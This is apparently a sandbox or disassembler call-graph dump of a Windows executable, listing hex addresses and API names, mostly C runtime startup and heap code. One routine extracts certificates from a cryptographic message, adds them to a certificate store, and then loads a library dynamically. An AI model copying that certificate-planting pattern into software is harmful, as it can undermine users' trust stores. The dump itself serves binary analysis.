5714->5711 5718 6139f8 5715->5718 5721 61392e 5718->5721 5720 613a1c 5720->5711 5722 61393a ___scrt_is_nonwritable_in_current_image 5721->5722 5729 6156e2 EnterCriticalSection 5722->5729 5724 613948 5730 613b40 5724->5730 5726 613955 5740 613973 5726->5740 5728 613966 _abort 5728->5720 5729->5724 5731 613b5e 5730->5731 5739 613b56 __dosmaperr 5730->5739 5732 613bb7 5731->5732 5731->5739 5743 61681b 5731->5743 5733 61681b 24 API calls 5732->5733 5732->5739 5735 613bcd 5733->5735 5737 614869 _free 15 API calls 5735->5737 5736 613bad 5738 614869 _free 15 API calls 5736->5738 5737->5739 5738->5732 5739->5726 5771 61572a LeaveCriticalSection 5740->5771 5742 61397d 5742->5728 5744 616826 5743->5744 5745 61684e 5744->5745 5746 61683f 5744->5746 5747 61685d 5745->5747 5752 617e13 5745->5752 5748 6147f9 _free 15 API calls 5746->5748 5759 617e46 5747->5759 5751 616844 _abort 5748->5751 5751->5736 5753 617e33 HeapSize 5752->5753 5754 617e1e 5752->5754 5753->5747 5755 6147f9 _free 15 API calls 5754->5755 5756 617e23 5755->5756 5757 61473d _abort 21 API calls 5756->5757 5758 617e2e 5757->5758 5758->5747 5760 617e53 5759->5760 5761 617e5e 5759->5761 5762 6162ff 16 API calls 5760->5762 5763 617e66 5761->5763 5769 617e6f __dosmaperr 5761->5769 5767 617e5b 5762->5767 5764 614869 _free 15 API calls 5763->5764 5764->5767 5765 617e74 5768 6147f9 _free 15 API calls 5765->5768 5766 617e99 HeapReAlloc 5766->5767 5766->5769 5767->5751 5768->5767 5769->5765 5769->5766 5770 616992 __dosmaperr 2 API calls 5769->5770 5770->5769 5771->5742 5773 613e48 5772->5773 5777 613e68 5772->5777 5774 6147f9 _free 15 API calls 5773->5774 5775 613e5e 5774->5775 5776 61473d _abort 21 API calls 5775->5776 5776->5777 5777->5695 4893 61130d 4894 611319 ___scrt_is_nonwritable_in_current_image 4893->4894 4921 61162b 4894->4921 4896 611320 4897 611473 4896->4897 4908 61134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 4896->4908 4973 61191f IsProcessorFeaturePresent 4897->4973 4899 61147a 4900 611480 4899->4900 4977 6137e1 4899->4977 4980 613793 4900->4980 4904 611369 4908->4904 4911 6113ea 4908->4911 4958 6137a9 4908->4958 4929 611a34 4911->4929 4913 611405 4964 611a6a GetModuleHandleW 4913->4964 4916 611410 4917 611419 4916->4917 4966 613784 4916->4966 4969 61179c 4917->4969 4922 611634 4921->4922 4983 611bd4 IsProcessorFeaturePresent 4922->4983 4926 611645 4927 611649 4926->4927 4993 611f7d 4926->4993 4927->4896 5053 6120b0 4929->5053 4932 6113f0 4933 613457 4932->4933 5055 61522b 4933->5055 4935 6113f8 4938 611000 6 API calls 4935->4938 4936 613460 4936->4935 5059 6155b6 4936->5059 4939 6111e3 Sleep 4938->4939 4940 611096 CryptMsgGetParam 4938->4940 4941 611215 CertCloseStore LocalFree LocalFree LocalFree 4939->4941 4942 6111f7 4939->4942 4943 611162 CryptMsgGetParam 4940->4943 4944 6110bc LocalAlloc 4940->4944 4941->4913 4942->4941 4948 61120a CertDeleteCertificateFromStore 4942->4948 4943->4939 4947 611174 CryptMsgGetParam 4943->4947 4945 6110d7 4944->4945 4946 611156 LocalFree 4944->4946 4949 6110e0 LocalAlloc CryptMsgGetParam 4945->4949 4946->4943 4947->4939 4950 611188 CertFindAttribute CertFindAttribute 4947->4950 4948->4942 4951 611114 CertCreateCertificateContext 4949->4951 4952 61113d LocalFree 4949->4952 4953 6111b1 4950->4953 4954 6111b5 LoadLibraryA GetProcAddress 4950->4954 4955 611133 CertFreeCertificateContext 4951->4955 4956 611126 CertAddCertificateContextToStore 4951->4956 4952->4949 4957 61114d 4952->4957 4953->4939 4953->4954 4954->4939 4955->4952 4956->4955 4957->4946 4959 6137d1 __dosmaperr _abort 4958->4959 4959->4911 4960 614424 _abort 33 API calls 4959->4960 4963 613e9a 4960->4963 4961 613f24 _abort 33 API calls 4962 613ec4 4961->4962 4963->4961 4965 61140c 4964->4965 4965->4899 4965->4916 5547 61355e 4966->5547 4968 61378f 4968->4917 4971 6117a8 ___scrt_uninitialize_crt 4969->4971 4970 611421 4970->4904 4971->4970 4972 611f7d ___scrt_uninitialize_crt 7 API calls 4971->4972 4972->4970 4974 611935 _abort 4973->4974 4975 6119e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4974->4975 4976 611a24 _abort 4975->4976 4976->4899 4978 61355e _abort 23 API calls 4977->4978 4979 6137f2 4978->4979 4979->4900 4981 61355e _abort 23 API calls 4980->4981 4982 611488 4981->4982 4984 611640 4983->4984 4985 611f5e 4984->4985 4999 6124b1 4985->4999 4988 611f67 4988->4926 4990 611f6f 4991 611f7a 4990->4991 5013 6124ed 4990->5013 4991->4926 4994 611f90 4993->4994 4995 611f86 4993->4995 4994->4927 4996 612496 ___vcrt_uninitialize_ptd 6 API calls 4995->4996 4997 611f8b 4996->4997 4998 6124ed ___vcrt_uninitialize_locks DeleteCriticalSection 4997->4998 4998->4994 5000 6124ba 4999->5000 5002 6124e3 5000->5002 5003 611f63 5000->5003 5017 61271d 5000->5017 5004 6124ed ___vcrt_uninitialize_locks DeleteCriticalSection 5002->5004 5003->4988 5005 612463 5003->5005 5004->5003 5034 61262e 5005->5034 5008 612478 5008->4990 5011 612493 5011->4990 5014 612517 5013->5014 5015 6124f8 5013->5015 5014->4988 5016 612502 DeleteCriticalSection 5015->5016 5016->5014 5016->5016 5022 612543 5017->5022 5020 612755 InitializeCriticalSectionAndSpinCount 5021 612740 5020->5021 5021->5000 5023 612560 5022->5023 5026 612564 5022->5026 5023->5020 5023->5021 5024 6125cc GetProcAddress 5024->5023 5026->5023 5026->5024 5027 6125bd 5026->5027 5029 6125e3 LoadLibraryExW 5026->5029 5027->5024 5028 6125c5 FreeLibrary 5027->5028 5028->5024 5030 6125fa GetLastError 5029->5030 5031 61262a 5029->5031 5030->5031 5032 612605 5030->5032 5031->5026 5032->5031 5033 61261b LoadLibraryExW 5032->5033 5033->5026 5035 612543 ___vcrt_FlsGetValue 5 API calls 5034->5035 5036 612648 5035->5036 5037 612661 TlsAlloc 5036->5037 5038 61246d 5036->5038 5038->5008 5039 6126df 5038->5039 5040 612543 ___vcrt_FlsGetValue 5 API calls 5039->5040 5041 6126f9 5040->5041 5042 612714 TlsSetValue 5041->5042 5043 612486 5041->5043 5042->5043 5043->5011 5044 612496 5043->5044 5045 6124a0 5044->5045 5046 6124a6 5044->5046 5048 612669 5045->5048 5046->5008 5049 612543 ___vcrt_FlsGetValue 5 API calls 5048->5049 5050 612683 5049->5050 5051 61269b TlsFree 5050->5051 5052 61268f 5050->5052 5051->5052 5052->5046 5054 611a47 GetStartupInfoW 5053->5054 5054->4932 5056 615234 5055->5056 5057 61523d 5055->5057 5062 61512a 5056->5062 5057->4936 5544 61555d 5059->5544 5082 614424 GetLastError 5062->5082 5064 615137 5102 615249 5064->5102 5066 61513f 5111 614ebe 5066->5111 5069 615156 5069->5057 5073 61518c 5075 615194 5073->5075 5079 6151b1 5073->5079 5133 6147f9 5075->5133 5077 6151dd 5078 615199 5077->5078 5142 614d94 5077->5142 5136 614869 5078->5136 5079->5077 5080 614869 _free 15 API calls 5079->5080 5080->5077 5083 614440 5082->5083 5084 61443a 5082->5084 5088 61448f SetLastError 5083->5088 5150 61480c 5083->5150 5145 615904 5084->5145 5088->5064 5090 614869 _free 15 API calls 5094 614460 5090->5094 5091 61446f 5092 61445a 5091->5092 5093 614476 5091->5093 5092->5090 5162 614296 5093->5162 5096 61449b SetLastError 5094->5096 5167 613f24 5096->5167 5099 614869 _free 15 API calls 5101 614488 5099->5101 5101->5088 5101->5096 5103 615255 ___scrt_is_nonwritable_in_current_image 5102->5103 5104 614424 _abort 33 API calls 5103->5104 5105 61525f 5104->5105 5108 613f24 _abort 33 API calls 5105->5108 5109 6152e3 _abort 5105->5109 5110 614869 _free 15 API calls 5105->5110 5403 6156e2 EnterCriticalSection 5105->5403 5404 6152da 5105->5404 5108->5105 5109->5066 5110->5105 5408 613f72 5111->5408 5114 614ef1 5116 614f08 5114->5116 5117 614ef6 GetACP 5114->5117 5115 614edf GetOEMCP 5115->5116 5116->5069 5118 6162ff 5116->5118 5117->5116 5119 61633d 5118->5119 5124 61630d __dosmaperr 5118->5124 5121 6147f9 _free 15 API calls 5119->5121 5120 616328 HeapAlloc 5122 615167 5120->5122 5120->5124 5121->5122 5122->5078 5125 6152eb 5122->5125 5123 616992 __dosmaperr 2 API calls 5123->5124 5124->5119 5124->5120 5124->5123 5126 614ebe 35 API calls 5125->5126 5127 61530a 5126->5127 5128 61535b IsValidCodePage 5127->5128 5130 615311 _ValidateLocalCookies 5127->5130 5132 615380 _abort 5127->5132 5129 61536d GetCPInfo 5128->5129 5128->5130 5129->5130 5129->5132 5130->5073 5445 614f96 GetCPInfo 5132->5445 5134 6144a8 __dosmaperr 15 API calls 5133->5134 5135 6147fe 5134->5135 5135->5078 5137 61489d _free 5136->5137 5138 614874 HeapFree 5136->5138 5137->5069 5138->5137 5139 614889 5138->5139 5140 6147f9 _free 13 API calls 5139->5140 5141 61488f GetLastError 5140->5141 5141->5137 5508 614d51 5142->5508 5144 614db8 5144->5078 5178 615741 5145->5178 5147 61592b 5148 615943 TlsGetValue 5147->5148 5149 615937 _ValidateLocalCookies 5147->5149 5148->5149 5149->5083 5155 614819 __dosmaperr 5150->5155 5151 614859 5154 6147f9 _free 14 API calls 5151->5154 5152 614844 HeapAlloc 5153 614452 5152->5153 5152->5155 5153->5092 5157 61595a 5153->5157 5154->5153 5155->5151 5155->5152 5191 616992 5155->5191 5158 615741 __dosmaperr 5 API calls 5157->5158 5159 615981 5158->5159 5160 61599c TlsSetValue 5159->5160 5161 615990 _ValidateLocalCookies 5159->5161 5160->5161 5161->5091 5205 61426e 5162->5205 5313 616b14 5167->5313 5170 613f35 5172 613f5c 5170->5172 5173 613f3e IsProcessorFeaturePresent 5170->5173 5174 613793 _abort 23 API calls 5172->5174 5175 613f49 5173->5175 5176 613f66 5174->5176 5341 614573 5175->5341 5181 61576d 5178->5181 5183 615771 __dosmaperr 5178->5183 5179 615791 5182 61579d GetProcAddress 5179->5182 5179->5183 5181->5179 5181->5183 5184 6157dd 5181->5184 5182->5183 5183->5147 5185 6157f3 5184->5185 5186 6157fe LoadLibraryExW 5184->5186 5185->5181 5187 61581b GetLastError 5186->5187 5190 615833 5186->5190 5188 615826 LoadLibraryExW 5187->5188 5187->5190 5188->5190 5189 61584a FreeLibrary 5189->5185 5190->5185 5190->5189 5194 6169d6 5191->5194 5193 6169a8 _ValidateLocalCookies 5193->5155 5195 6169e2 ___scrt_is_nonwritable_in_current_image 5194->5195 5200 6156e2 EnterCriticalSection 5195->5200 5197 6169ed 5201 616a1f 5197->5201 5199 616a14 _abort 5199->5193 5200->5197 5204 61572a LeaveCriticalSection 5201->5204 5203 616a26 5203->5199 5204->5203 5211 6141ae 5205->5211 5207 614292 5208 61421e 5207->5208 5222 6140b2 5208->5222 5210 614242 5210->5099 5212 6141ba ___scrt_is_nonwritable_in_current_image 5211->5212 5217 6156e2 EnterCriticalSection 5212->5217 5214 6141c4 5218 6141ea 5214->5218 5216 6141e2 _abort 5216->5207 5217->5214 5221 61572a LeaveCriticalSection 5218->5221 5220 6141f4 5220->5216 5221->5220 5223 6140be ___scrt_is_nonwritable_in_current_image 5222->5223 5230 6156e2 EnterCriticalSection 5223->5230 5225 6140c8 5231 6143d9 5225->5231 5227 6140e0 5235 6140f6 5227->5235 5229 6140ee _abort 5229->5210 5230->5225 5232 61440f __fassign 5231->5232 5233 6143e8 __fassign 5231->5233 5232->5227 5233->5232 5238 616507 5233->5238 5312 61572a LeaveCriticalSection 5235->5312 5237 614100 5237->5229 5239 616587 5238->5239 5243 61651d 5238->5243 5240 6165d5 5239->5240 5242 614869 _free 15 API calls 5239->5242 5306 61667a 5240->5306 5245 6165a9 5242->5245 5243->5239 5244 616550 5243->5244 5248 614869 _free 15 API calls 5243->5248 5246 616572 5244->5246 5253 614869 _free 15 API calls 5244->5253 5247 614869 _free 15 API calls 5245->5247 5250 614869 _free 15 API calls 5246->5250 5249 6165bc 5247->5249 5252 616545 5248->5252 5254 614869 _free 15 API calls 5249->5254 5255 61657c 5250->5255 5251 616643 5257 614869 _free 15 API calls 5251->5257 5266 616078 5252->5266 5259 616567 5253->5259 5260 6165ca 5254->5260 5256 614869 _free 15 API calls 5255->5256 5256->5239 5261 616649 5257->5261 5294 616176 5259->5294 5264 614869 _free 15 API calls 5260->5264 5261->5232 5262 6165e3 5262->5251 5265 614869 15 API calls _free 5262->5265 5264->5240 5265->5262 5267 616089 5266->5267 5293 616172 5266->5293 5268 61609a 5267->5268 5270 614869 _free 15 API calls 5267->5270 5269 6160ac 5268->5269 5271 614869 _free 15 API calls 5268->5271 5272 6160be 5269->5272 5273 614869 _free 15 API calls 5269->5273 5270->5268 5271->5269 5274 6160d0 5272->5274 5275 614869 _free 15 API calls 5272->5275 5273->5272 5276 6160e2 5274->5276 5278 614869 _free 15 API calls 5274->5278 5275->5274 5277 6160f4 5276->5277 5279 614869 _free 15 API calls 5276->5279 5280 616106 5277->5280 5281 614869 _free 15 API calls 5277->5281 5278->5276 5279->5277 5282 614869 _free 15 API calls 5280->5282 5285 616118 5280->5285 5281->5280 5282->5285 5283 61612a 5284 61613c 5283->5284 5287 614869 _free 15 API calls 5283->5287 5288 61614e 5284->5288 5289 614869 _free 15 API calls 5284->5289 5285->5283 5286 614869 _free 15 API calls 5285->5286 5286->5283 5287->5284 5290 616160 5288->5290 5291 614869 _free 15 API calls 5288->5291 5289->5288 5292 614869 _free 15 API calls 5290->5292 5290->5293 5291->5290 5292->5293 5293->5244 5295 616183 5294->5295 5296 6161db 5294->5296 5297 616193 5295->5297 5298 614869 _free 15 API calls 5295->5298 5296->5246 5299 6161a5 5297->5299 5300 614869 _free 15 API calls 5297->5300 5298->5297 5301 6161b7 5299->5301 5302 614869 _free 15 API calls 5299->5302 5300->5299 5303 6161c9 5301->5303 5304 614869 _free 15 API calls 5301->5304 5302->5301 5303->5296 5305 614869 _free 15 API calls 5303->5305 5304->5303 5305->5296 5307 616687 5306->5307 5311 6166a5 5306->5311 5308 61621b __fassign 15 API calls 5307->5308 5307->5311 5309 61669f 5308->5309 5310 614869 _free 15 API calls 5309->5310 5310->5311 5311->5262 5312->5237 5345 616a82 5313->5345 5316 616b6f 5317 616b7b _abort 5316->5317 5322 616ba8 _abort 5317->5322 5324 616ba2 _abort 5317->5324 5359 6144a8 GetLastError 5317->5359 5319 616bf4 5320 6147f9 _free 15 API calls 5319->5320 5321 616bf9 5320->5321 5378 61473d 5321->5378 5327 616c20 5322->5327 5381 6156e2 EnterCriticalSection 5322->5381 5324->5319 5324->5322 5326 616bd7 _abort 5324->5326 5326->5170 5331 616c7f 5327->5331 5332 616c77 5327->5332 5338 616caa 5327->5338 5382 61572a LeaveCriticalSection 5327->5382 5330 613793 _abort 23 API calls 5330->5331 5331->5338 5383 616b66 5331->5383 5332->5330 5335 614424 _abort 33 API calls 5339 616d0d 5335->5339 5337 616b66 _abort 33 API calls 5337->5338 5386 616d2f 5338->5386 5339->5326 5340 614424 _abort 33 API calls 5339->5340 5340->5326 5342 61458f _abort 5341->5342 5343 6145bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5342->5343 5344 61468c _abort _ValidateLocalCookies 5343->5344 5344->5172 5348 616a28 5345->5348 5347 613f29 5347->5170 5347->5316 5349 616a34 ___scrt_is_nonwritable_in_current_image 5348->5349 5354 6156e2 EnterCriticalSection 5349->5354 5351 616a42 5355 616a76 5351->5355 5353 616a69 _abort 5353->5347 5354->5351 5358 61572a LeaveCriticalSection 5355->5358 5357 616a80 5357->5353 5358->5357 5360 6144c1 5359->5360 5361 6144c7 5359->5361 5362 615904 __dosmaperr 6 API calls 5360->5362 5363 61480c __dosmaperr 12 API calls 5361->5363 5365 61451e SetLastError 5361->5365 5362->5361 5364 6144d9 5363->5364 5366 6144e1 5364->5366 5368 61595a __dosmaperr 6 API calls 5364->5368 5367 614527 5365->5367 5369 614869 _free 12 API calls 5366->5369 5367->5324 5370 6144f6 5368->5370 5371 6144e7 5369->5371 5370->5366 5372 6144fd 5370->5372 5373 614515 SetLastError 5371->5373 5374 614296 __dosmaperr 12 API calls 5372->5374 5373->5367 5375 614508 5374->5375 5376 614869 _free 12 API calls 5375->5376 5377 61450e 5376->5377 5377->5365 5377->5373 5390 6146c2 5378->5390 5380 614749 5380->5326 5381->5327 5382->5332 5384 614424 _abort 33 API calls 5383->5384 5385 616b6b 5384->5385 5385->5337 5387 616d35 5386->5387 5388 616cfe 5386->5388 5402 61572a LeaveCriticalSection 5387->5402 5388->5326 5388->5335 5388->5339 5391 6144a8 __dosmaperr 15 API calls 5390->5391 5392 6146d8 5391->5392 5397 6146e6 _ValidateLocalCookies 5392->5397 5398 61474d IsProcessorFeaturePresent 5392->5398 5394 61473c 5395 6146c2 _abort 21 API calls 5394->5395 5396 614749 5395->5396 5396->5380 5397->5380 5399 614758 5398->5399 5400 614573 _abort 3 API calls 5399->5400 5401 61476d GetCurrentProcess TerminateProcess 5400->5401 5401->5394 5402->5388 5403->5105 5407 61572a LeaveCriticalSection 5404->5407 5406 6152e1 5406->5105 5407->5406 5409 613f8f 5408->5409 5410 613f85 5408->5410 5409->5410 5411 614424 _abort 33 API calls 5409->5411 5410->5114 5410->5115 5412 613fb0 5411->5412 5416 6172d1 5412->5416 5417 6172e4 5416->5417 5418 613fc9 5416->5418 5417->5418 5424 616754 5417->5424 5420 6172fe 5418->5420 5421 617311 5420->5421 5422 617326 5420->5422 5421->5422 5423 615249 __fassign 33 API calls 5421->5423 5422->5410 5423->5422 5425 616760 ___scrt_is_nonwritable_in_current_image 5424->5425 5426 614424 _abort 33 API calls 5425->5426 5427 616769 5426->5427 5428 6167b7 _abort 5427->5428 5436 6156e2 EnterCriticalSection 5427->5436 5428->5418 5430 616787 5437 6167cb 5430->5437 5435 613f24 _abort 33 API calls 5435->5428 5436->5430 5438 61679b 5437->5438 5439 6167d9 __fassign 5437->5439 5441 6167ba 5438->5441 5439->5438 5440 616507 __fassign 15 API calls 5439->5440 5440->5438 5444 61572a LeaveCriticalSection 5441->5444 5443 6167ae 5443->5428 5443->5435 5444->5443 5446 614fd0 5445->5446 5452 61507a _ValidateLocalCookies 5445->5452 5453 61634d 5446->5453 5448 615031 5465 617cd1 5448->5465 5451 617cd1 38 API calls 5451->5452 5452->5130 5454 613f72 __fassign 33 API calls 5453->5454 5455 61636d MultiByteToWideChar 5454->5455 5457 6163ab 5455->5457 5459 616443 _ValidateLocalCookies 5455->5459 5458 6163cc _abort __alloca_probe_16 5457->5458 5461 6162ff 16 API calls 5457->5461 5460 61643d 5458->5460 5463 616411 MultiByteToWideChar 5458->5463 5459->5448 5470 61646a 5460->5470 5461->5458 5463->5460 5464 61642d GetStringTypeW 5463->5464 5464->5460 5466 613f72 __fassign 33 API calls 5465->5466 5467 617ce4 5466->5467 5474 617ab4 5467->5474 5469 615052 5469->5451 5471 616476 5470->5471 5472 616487 5470->5472 5471->5472 5473 614869 _free 15 API calls 5471->5473 5472->5459 5473->5472 5476 617acf 5474->5476 5475 617af5 MultiByteToWideChar 5477 617ca9 _ValidateLocalCookies 5475->5477 5478 617b1f 5475->5478 5476->5475 5477->5469 5481 6162ff 16 API calls 5478->5481 5483 617b40 __alloca_probe_16 5478->5483 5479 617bf5 5485 61646a __freea 15 API calls 5479->5485 5480 617b89 MultiByteToWideChar 5480->5479 5482 617ba2 5480->5482 5481->5483 5499 615a15 5482->5499 5483->5479 5483->5480 5485->5477 5486 617bb9 5486->5479 5487 617c04 5486->5487 5488 617bcc 5486->5488 5489 6162ff 16 API calls 5487->5489 5492 617c25 __alloca_probe_16 5487->5492 5488->5479 5490 615a15 6 API calls 5488->5490 5489->5492 5490->5479 5491 617c9a 5494 61646a __freea 15 API calls 5491->5494 5492->5491 5493 615a15 6 API calls 5492->5493 5495 617c79 5493->5495 5494->5479 5495->5491 5496 617c88 WideCharToMultiByte 5495->5496 5496->5491 5497 617cc8 5496->5497 5498 61646a __freea 15 API calls 5497->5498 5498->5479 5500 615741 __dosmaperr 5 API calls 5499->5500 5501 615a3c 5500->5501 5504 615a45 _ValidateLocalCookies 5501->5504 5505 615a9d 5501->5505 5503 615a85 LCMapStringW 5503->5504 5504->5486 5506 615741 __dosmaperr 5 API calls 5505->5506 5507 615ac4 _ValidateLocalCookies 5506->5507 5507->5503 5509 614d5d ___scrt_is_nonwritable_in_current_image 5508->5509 5516 6156e2 EnterCriticalSection 5509->5516 5511 614d67 5517 614dbc 5511->5517 5515 614d80 _abort 5515->5144 5516->5511 5529 6154dc 5517->5529 5519 614e0a 5520 6154dc 21 API calls 5519->5520 5521 614e26 5520->5521 5522 6154dc 21 API calls 5521->5522 5523 614e44 5522->5523 5524 614d74 5523->5524 5525 614869 _free 15 API calls 5523->5525 5526 614d88 5524->5526 5525->5524 5543 61572a LeaveCriticalSection 5526->5543 5528 614d92 5528->5515 5530 6154ed 5529->5530 5538 6154e9 5529->5538 5531 6154f4 5530->5531 5534 615507 _abort 5530->5534 5532 6147f9 _free 15 API calls 5531->5532 5533 6154f9 5532->5533 5535 61473d _abort 21 API calls 5533->5535 5536 615535 5534->5536 5537 61553e 5534->5537 5534->5538 5535->5538 5539 6147f9 _free 15 API calls 5536->5539 5537->5538 5541 6147f9 _free 15 API calls 5537->5541 5538->5519 5540 61553a 5539->5540 5542 61473d _abort 21 API calls 5540->5542 5541->5540 5542->5538 5543->5528 5545 613f72 __fassign 33 API calls 5544->5545 5546 615571 5545->5546 5546->4936 5548 61356a _abort 5547->5548 5549 613582 5548->5549 5562 6136b8 GetModuleHandleW 5548->5562 5569 6156e2 EnterCriticalSection 5549->5569 5556 6135ff _abort 5573 613668 5556->5573 5557 61358a 5557->5556 5570 613c97 5557->5570 5558 613671 _abort 5558->4968 5563 613576 5562->5563 5563->5549 5564 6136fc GetModuleHandleExW 5563->5564 5565 613726 GetProcAddress 5564->5565 5566 61373b 5564->5566 5565->5566 5567 613758 _ValidateLocalCookies 5566->5567 5568 61374f FreeLibrary 5566->5568 5567->5549 5568->5567 5569->5557 5584 6139d0 5570->5584 5604 61572a LeaveCriticalSection 5573->5604 5575 613641 5575->5558 5576 613677 5575->5576 5605 615b1f 5576->5605 5578 613681 5579 6136a5 5578->5579 5580 613685 GetPEB 5578->5580 5581 6136fc _abort 3 API calls 5579->5581 5580->5579 5582 613695 GetCurrentProcess TerminateProcess 5580->5582 5583 6136ad ExitProcess 5581->5583 5582->5579 5587 61397f 5584->5587 5586 6139f4 5586->5556 5588 61398b ___scrt_is_nonwritable_in_current_image 5587->5588 5595 6156e2 EnterCriticalSection 5588->5595 5590 613999 5596 613a20 5590->5596 5592 6139a6 5600 6139c4 5592->5600 5594 6139b7 _abort 5594->5586 5595->5590 5597 613a48 5596->5597 5599 613a40 _ValidateLocalCookies 5596->5599 5598 614869 _free 15 API calls 5597->5598 5597->5599 5598->5599 5599->5592 5603 61572a LeaveCriticalSection 5600->5603 5602 6139ce 5602->5594 5603->5602 5604->5575 5606 615b44 5605->5606 5608 615b3a _ValidateLocalCookies 5605->5608 5607 615741 __dosmaperr 5 API calls 5606->5607 5607->5608 5608->5578 5778 61324d 5779 61522b 46 API calls 5778->5779 5780 61325f 5779->5780 5789 61561e GetEnvironmentStringsW 5780->5789 5783 61326a 5785 614869 _free 15 API calls 5783->5785 5786 61329f 5785->5786 5787 613275 5788 614869 _free 15 API calls 5787->5788 5788->5783 5790 615635 5789->5790 5791 615688 5789->5791 5794 61563b WideCharToMultiByte 5790->5794 5792 615691 FreeEnvironmentStringsW 5791->5792 5793 613264 5791->5793 5792->5793 5793->5783 5801 6132a5 5793->5801 5794->5791 5795 615657 5794->5795 5796 6162ff 16 API calls 5795->5796 5797 61565d 5796->5797 5798 61567a 5797->5798 5799 615664 WideCharToMultiByte 5797->5799 5800 614869 _free 15 API calls 5798->5800 5799->5798 5800->5791 5802 6132ba 5801->5802 5803 61480c __dosmaperr 15 API calls 5802->5803 5813 6132e1 5803->5813 5804 613345 5805 614869 _free 15 API calls 5804->5805 5806 61335f 5805->5806 5806->5787 5807 61480c __dosmaperr 15 API calls 5807->5813 5808 613347 5810 613376 15 API calls 5808->5810 5811 61334d 5810->5811 5814 614869 _free 15 API calls 5811->5814 5812 613369 5815 61474d _abort 6 API calls 5812->5815 5813->5804 5813->5807 5813->5808 5813->5812 5816 614869 _free 15 API calls 5813->5816 5818 613eca 5813->5818 5814->5804 5817 613375 5815->5817 5816->5813 5819 613ed7 5818->5819 5821 613ee5 5818->5821 5819->5821 5825 613efc 5819->5825 5820 6147f9 _free 15 API calls 5822 613eed 5820->5822 5821->5820 5823 61473d _abort 21 API calls 5822->5823 5824 613ef7 5823->5824 5824->5813 5825->5824 5826 6147f9 _free 15 API calls 5825->5826 5826->5822 5963 61430f 5964 61431a 5963->5964 5968 61432a 5963->5968 5969 614330 5964->5969 5967 614869 _free 15 API calls 5967->5968 5970 614343 5969->5970 5973 614349 5969->5973 5971 614869 _free 15 API calls 5970->5971 5971->5973 5972 614869 _free 15 API calls 5974 614355 5972->5974 5973->5972 5975 614869 _free 15 API calls 5974->5975 5976 614360 5975->5976 5977 614869 _free 15 API calls 5976->5977 5978 61436b 5977->5978 5979 614869 _free 15 API calls 5978->5979 5980 614376 5979->5980 5981 614869 _free 15 API calls 5980->5981 5982 614381 5981->5982 5983 614869 _free 15 API calls 5982->5983 5984 61438c 5983->5984 5985 614869 _free 15 API calls 5984->5985 5986 614397 5985->5986 5987 614869 _free 15 API calls 5986->5987 5988 6143a2 5987->5988 5989 614869 _free 15 API calls 5988->5989 5990 6143b0 5989->5990 5995 6141f6 5990->5995 6001 614102 5995->6001 5997 61421a 5998 614246 5997->5998 6014 614163 5998->6014 6000 61426a 6000->5967 6002 61410e ___scrt_is_nonwritable_in_current_image 6001->6002 6009 6156e2 EnterCriticalSection 6002->6009 6005 614118 6007 614869 _free 15 API calls 6005->6007 6008 614142 6005->6008 6006 61414f _abort 6006->5997 6007->6008 6010 614157 6008->6010 6009->6005 6013 61572a LeaveCriticalSection 6010->6013 6012 614161 6012->6006 6013->6012 6015 61416f ___scrt_is_nonwritable_in_current_image 6014->6015 6022 6156e2 EnterCriticalSection 6015->6022 6017 614179 6018 6143d9 __dosmaperr 15 API calls 6017->6018 6019 61418c 6018->6019 6023 6141a2 6019->6023 6021 61419a _abort 6021->6000 6022->6017 6026 61572a LeaveCriticalSection 6023->6026 6025 6141ac 6025->6021 6026->6025 6660 613d8f 6661 613db2 6660->6661 6662 613d9e 6660->6662 6663 614869 _free 15 API calls 6661->6663 6662->6661 6664 614869 _free 15 API calls 6662->6664 6665 613dc4 6663->6665 6664->6661 6666 614869 _free 15 API calls 6665->6666 6667 613dd7 6666->6667 6668 614869 _free 15 API calls 6667->6668 6669 613de8 6668->6669 6670 614869 _free 15 API calls 6669->6670 6671 613df9 6670->6671 6508 6155ce GetCommandLineA GetCommandLineW 5827 617351 5828 61735e 5827->5828 5829 61480c __dosmaperr 15 API calls 5828->5829 5830 617378 5829->5830 5831 614869 _free 15 API calls 5830->5831 5832 617384 5831->5832 5833 6173aa 5832->5833 5834 61480c __dosmaperr 15 API calls 5832->5834 5838 6173b6 5833->5838 5839 617414 5833->5839 5840 6159b3 5833->5840 5836 61739e 5834->5836 5837 614869 _free 15 API calls 5836->5837 5837->5833 5841 615741 __dosmaperr 5 API calls 5840->5841 5842 6159da 5841->5842 5843 6159f8 InitializeCriticalSectionAndSpinCount 5842->5843 5844 6159e3 _ValidateLocalCookies 5842->5844 5843->5844 5844->5833 6027 617a10 6030 617a27 6027->6030 6031 617a35 6030->6031 6032 617a49 6030->6032 6033 6147f9 _free 15 API calls 6031->6033 6034 617a51 6032->6034 6035 617a63 6032->6035 6036 617a3a 6033->6036 6037 6147f9 _free 15 API calls 6034->6037 6038 613f72 __fassign 33 API calls 6035->6038 6042 617a22 6035->6042 6039 61473d _abort 21 API calls 6036->6039 6040 617a56 6037->6040 6038->6042 6039->6042 6041 61473d _abort 21 API calls 6040->6041 6041->6042 6509 615fd0 6510 615fdc ___scrt_is_nonwritable_in_current_image 6509->6510 6521 6156e2 EnterCriticalSection 6510->6521 6512 615fe3 6522 615c8b 6512->6522 6514 615ff2 6520 616001 6514->6520 6535 615e64 GetStartupInfoW 6514->6535 6519 616012 _abort 6546 61601d 6520->6546 6521->6512 6523 615c97 ___scrt_is_nonwritable_in_current_image 6522->6523 6524 615ca4 6523->6524 6525 615cbb 6523->6525 6527 6147f9 _free 15 API calls 6524->6527 6549 6156e2 EnterCriticalSection 6525->6549 6528 615ca9 6527->6528 6529 61473d _abort 21 API calls 6528->6529 6531 615cb3 _abort 6529->6531 6530 615cf3 6557 615d1a 6530->6557 6531->6514 6532 615cc7 6532->6530 6550 615bdc 6532->6550 6536 615e81 6535->6536 6537 615f13 6535->6537 6536->6537 6538 615c8b 22 API calls 6536->6538 6541 615f1a 6537->6541 6539 615eaa 6538->6539 6539->6537 6540 615ed8 GetFileType 6539->6540 6540->6539 6542 615f21 6541->6542 6543 615f64 GetStdHandle 6542->6543 6544 615fcc 6542->6544 6545 615f77 GetFileType 6542->6545 6543->6542 6544->6520 6545->6542 6561 61572a LeaveCriticalSection 6546->6561 6548 616024 6548->6519 6549->6532 6551 61480c __dosmaperr 15 API calls 6550->6551 6552 615bee 6551->6552 6554 6159b3 6 API calls 6552->6554 6556 615bfb 6552->6556 6553 614869 _free 15 API 